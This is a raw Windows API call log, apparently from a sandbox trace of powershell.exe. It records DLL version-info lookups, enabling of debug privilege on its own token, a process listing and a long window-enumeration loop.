	[0245.846] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dec0 | out: lpdwHandle=0x16dec0) returned 0x94c
	[0245.847] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c372d8 | out: lpData=0x2c372d8) returned 1
	[0245.849] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de38, puLen=0x16de30 | out: lplpBuffer=0x16de38*=0x2c37374, puLen=0x16de30) returned 1
	[0245.851] lstrlenW (lpString="䅁") returned 1
	[0245.858] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c37450, puLen=0x16dda0) returned 1
	[0245.859] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0246.282] CoTaskMemAlloc (cb=0x2e) returned 0x2bddf0
	[0246.282] lstrcpyW (in: lpString1=0x2bddf0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0246.283] CoTaskMemFree (pv=0x2bddf0) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c374a4, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="System.Management.Automation") returned 28
	[0246.283] CoTaskMemAlloc (cb=0x3c) returned 0x2bed80
	[0246.283] lstrcpyW (in: lpString1=0x2bed80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0246.283] CoTaskMemFree (pv=0x2bed80) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c37500, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.283] CoTaskMemAlloc (cb=0x20) returned 0x2bf1b0
	[0246.283] lstrcpyW (in: lpString1=0x2bf1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.283] CoTaskMemFree (pv=0x2bf1b0) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c37540, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.283] CoTaskMemAlloc (cb=0x44) returned 0x2bed80
	[0246.283] lstrcpyW (in: lpString1=0x2bed80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.283] CoTaskMemFree (pv=0x2bed80) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c375a8, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0246.283] CoTaskMemAlloc (cb=0x76) returned 0x260090
	[0246.283] lstrcpyW (in: lpString1=0x260090, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0246.283] CoTaskMemFree (pv=0x260090) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c37644, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0246.283] CoTaskMemAlloc (cb=0x44) returned 0x2bed80
	[0246.283] lstrcpyW (in: lpString1=0x2bed80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0246.283] CoTaskMemFree (pv=0x2bed80) 
	[0246.283] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c376a8, puLen=0x16dda0) returned 1
	[0246.283] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0246.283] CoTaskMemAlloc (cb=0x58) returned 0x2834a0
	[0246.283] lstrcpyW (in: lpString1=0x2834a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0246.284] CoTaskMemFree (pv=0x2834a0) 
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c37724, puLen=0x16dda0) returned 1
	[0246.284] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0246.284] CoTaskMemAlloc (cb=0x20) returned 0x2bf1b0
	[0246.284] lstrcpyW (in: lpString1=0x2bf1b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0246.284] CoTaskMemFree (pv=0x2bf1b0) 
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x2c373cc, puLen=0x16dda0) returned 1
	[0246.284] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0246.284] CoTaskMemAlloc (cb=0x66) returned 0x2bb610
	[0246.284] lstrcpyW (in: lpString1=0x2bb610, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0246.284] CoTaskMemFree (pv=0x2bb610) 
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x0, puLen=0x16dda0) returned 0
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x0, puLen=0x16dda0) returned 0
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16dda8, puLen=0x16dda0 | out: lplpBuffer=0x16dda8*=0x0, puLen=0x16dda0) returned 0
	[0246.284] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dd78, puLen=0x16dd70 | out: lplpBuffer=0x16dd78*=0x2c37374, puLen=0x16dd70) returned 1
	[0246.285] CoTaskMemAlloc (cb=0x204) returned 0x262860
	[0246.285] VerLanguageNameW (in: wLang=0x0, szLang=0x262860, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0246.286] CoTaskMemFree (pv=0x262860) 
	[0246.286] VerQueryValueW (in: pBlock=0x2c372d8, lpSubBlock="\\", lplpBuffer=0x16ddc8, puLen=0x16ddc0 | out: lplpBuffer=0x16ddc8*=0x2c37300, puLen=0x16ddc0) returned 1
	[0246.291] GetCurrentProcessId () returned 0x80c
	[0246.303] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x16ccf0 | out: lpLuid=0x16ccf0*(LowPart=0x14, HighPart=0)) returned 1
	[0246.306] GetCurrentProcess () returned 0xffffffffffffffff
	[0246.306] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x16cd10 | out: TokenHandle=0x16cd10*=0x2ec) returned 1
	[0246.307] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2c3ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0246.308] CloseHandle (hObject=0x2ec) returned 1
	[0246.312] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x80c) returned 0x2ec
	[0246.319] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2c3abb8, cb=0x200, lpcbNeeded=0x16dd28 | out: lphModule=0x2c3abb8, lpcbNeeded=0x16dd28) returned 1
	[0246.321] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2c3ae28, cb=0x18 | out: lpmodinfo=0x2c3ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0246.322] CoTaskMemAlloc (cb=0x804) returned 0x2c6ed0
	[0246.322] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x2c6ed0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0246.322] CoTaskMemFree (pv=0x2c6ed0) 
	[0246.323] CoTaskMemAlloc (cb=0x804) returned 0x2c6ed0
	[0246.323] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x2c6ed0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0246.323] CoTaskMemFree (pv=0x2c6ed0) 
	[0246.323] CloseHandle (hObject=0x2ec) returned 1
	[0246.756] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x80c) returned 0x2ec
	[0246.756] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x16de58 | out: lpExitCode=0x16de58*=0x103) returned 1
	[0246.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c3b088, Length=0x20000, ResultLength=0x16de20 | out: SystemInformation=0x12c3b088, ResultLength=0x16de20*=0xf590) returned 0x0
	[0246.773] EnumWindows (lpEnumFunc=0x26466ac, lParam=0x0) returned 1
	[0248.390] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x558
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x538
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x778
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x778
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.948] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xa04
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x924
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x8dc
	[0248.949] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x7dc
	[0248.950] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x768
	[0248.950] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x764
	[0248.950] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x820
	[0248.950] GetWindow (hWnd=0x201e4, uCmd=0x4) returned 0x0
	[0248.951] IsWindowVisible (hWnd=0x201e4) returned 0
	[0248.951] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x810
	[0248.951] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x794
	[0248.951] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x83c
	[0248.951] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x7ac
	[0248.951] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb44
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb5c
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x838
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.952] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x818
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x5b8
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x494
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x1ec
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x440
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x7e8
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x730
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x2c8
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x31c
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x330
	[0248.953] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x128
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x5c8
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x6f8
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x358
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x73c
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb0
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x250
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x240
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x790
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x61c
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x540
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x538
	[0248.954] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x568
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x538
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x568
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x538
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x540
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x540
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x510
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x57c
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x554
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x528
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.955] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x79c
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4e0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x44c
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x778
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x460
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x558
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4d0
	[0248.956] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xa28
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x9b0
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x8d8
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x940
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x93c
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x4ec
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x150
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x720
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x3c4
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x7d4
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x6c8
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb54
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb54
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb5c
	[0248.957] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x838
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x818
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x5b8
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x494
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x1ec
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x440
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x7e8
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x730
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x2c8
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x31c
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x330
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x128
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x5c8
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x6f8
	[0248.958] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x358
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x73c
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0xb0
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x250
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x240
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x790
	[0248.959] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x16db80 | out: lpdwProcessId=0x16db80) returned 0x61c
